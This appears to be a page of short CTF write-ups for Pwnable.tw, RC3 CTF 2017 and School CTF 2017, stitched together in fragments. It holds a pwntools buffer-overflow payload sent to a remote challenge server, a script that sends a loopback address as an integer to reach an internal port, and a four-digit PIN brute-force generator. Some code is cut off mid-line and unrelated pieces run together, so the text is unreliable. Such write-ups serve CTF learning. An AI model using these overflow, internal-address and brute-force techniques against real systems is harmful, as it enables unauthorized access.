Pwnable.tw - Start (100)


RC3 CTF 2017 - Write Up

    v2 = 0;
    v1 = 0;
    printf("Enter Key: ");
    gets((char *)&v0);
    if ( v2 == 0xCAFEF00D && v1 == 0xC0FFEE )
      sub_80484EF();
    puts("Error: Invalid key!");
    srand(1u);
    init();
    }

    baby = remote("18.216.183.46", 4200)
    p = ""
    p += "A" * 16
    p += p32(0xC0FFEE)  # v1
    p += p32(0xCAFEF00D)  # v2
    baby.sendlineafter(": ", p)
    print baby.

RC3 CTF 2017 Write Up

Reversing (100)

We are given a 64-bit ELF file, not stripped.

    $ file hello
    hello: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e85915bc2c95f7eac6c02254b065d9161e5efca2, not stripped

Running strings alone is enough to get the correct flag.

    $ strings hello | grep RC
    RC3-2017{little_ball_of_fur}

Easy enough for a 100-point challenge :)

Flag : RC3-2017{little_ball_of_fur}

Web (100)

We are given a website, http://13.59.6.98

    $ curl http://13.59.6.98
    <meta http-equiv="refresh" content="0; url=C.html" />
    <p hidden>R</p>

The website refreshes automatically when visited in a browser.

School CTF 2017 - Write Up

Task URL

Can you find it?

Task URL

    import re
    from socket import inet_aton
    from struct import unpack

    import requests

    def ip2long(ip):
        # Pack the dotted-quad address and read it back as one 32-bit integer
        aton = inet_aton(ip)
        return unpack("!L", aton)[0]

    def main():
        URL = "http://portscan.task.school-CTF.org/port"
        IP = "127.0.0.1"
        HOST = ip2long(IP)
        PORT = "31337"
        print "Host : {}".format(HOST)
        r = requests.post(URL, data={"host": HOST, "port": PORT})
        raw_content = r.content
        flag = re.findall("SchoolCTF{.*?}", raw_content)
        print "Flag : {}".format(flag[0])

    if __name__ == '__main__':
        main()

p.s. It seems that one of them said that they haven't yet fully configured the security system and the password can be cracked.

Safe URL

    from itertools import product

    def a(pin):
        # Keep a PIN only if its last digit equals the sum of the first three, mod 10
        if (int(pin[0]) + int(pin[1]) + int(pin[2])) % 10 == int(pin[3]):
            return pin
        else:
            return None

    pin_list = []
    prod_pin = product("123456789", repeat=4)
    prod_pin = ["".join(x) for x in list(prod_pin)]
    prod_pin = map(a, prod_pin)
    prod_pin = filter(None, prod_pin)
    prod_pin = list(set(prod_pin))
    pin_list += prod_pin